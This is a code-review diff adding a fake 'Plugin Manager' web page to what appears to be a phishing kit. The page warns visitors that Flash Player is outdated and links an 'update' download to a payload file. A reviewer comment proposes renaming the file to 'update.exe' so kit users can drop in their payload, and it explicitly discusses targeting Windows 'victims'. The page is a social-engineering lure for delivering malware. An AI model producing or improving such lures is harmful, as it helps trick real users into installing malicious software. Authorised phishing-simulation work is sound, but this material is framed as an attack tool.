phishing-pages/plugin-update/index.html

```diff
@@ -0,0 +1,140 @@
+<!DOCTYPE html>
+<html>
+   
+   <head>
+      <link rel="icon" href="images/favicon.ico">  
+      <title>Plugin Manager</title>
+      <meta name = "viewport" content = "width = device-width, initial-scale = 1.0">
+      
+      <link href = "css/bootstrap.min.css" rel = "stylesheet">
+      <link href="css/theme.css" rel="stylesheet">
+      
+   </head>
+   
+   <body>
+      
+    <nav class="navbar navbar-inverse navbar-fixed-top">
+      <div class="container">
+        <div class="navbar-header">
+          <a class="navbar-brand" href="">Plugin Manager</a>
+        </div>
+        </div>
+        </nav>
+
+
+      <div class="container theme-showcase" role="main">
+
+      <div class="alert alert-warning" role="alert">
+        <h4><strong>WARNING:</strong> Your browser plugins are severely out of date. Update your browser plugins to continue browsing securely.</h4>
+      </div>
+
+      <div class="page-header">
+        <h1><strong>Update Your Plugins</strong></h1>
+        <h4>Keeping your plugins up to date helps your browser run safely and smoothly.</h4>
+      </div>
+
+      <div class="jumbotron">
+        <h1>Plugin Status</h1>
+       <br>
+
+      <div class="row">
+        <div class="col-md-13">
+          <table class="table">
+            <thead>
+              <tr>
+                <th><h3>Plugin</h3></th>
+                <th><h3>Status</h3></th>
+                <th><h3>Action</h3></th>
+
+              </tr>
+            </thead>
+            <tbody>
+              <tr>
+                <td>
+                  <strong>Flash Player</strong><br>
+                  Flash Player is a lightweight browser plug-in and rich Internet application runtime that delivers consistent and engaging user experiences, stunning audio/video playback, and exciting gameplay
+               </td>
+
+                <td>
+                  <br><strong>Outdated</strong>
+               </td>
+
+                <td>
+                  <h4>
+                  <form method="get" action="update/payloadFile.txt">
```

Comment:
I would recommend changing from `payloadFile.txt` to `update.exe`. Users would simply need to name their payload as `update.exe` and put it in the `update` directory (without having to edit the code). Yes, I'm assuming that the victims are Windows users but that's the most likely scenario.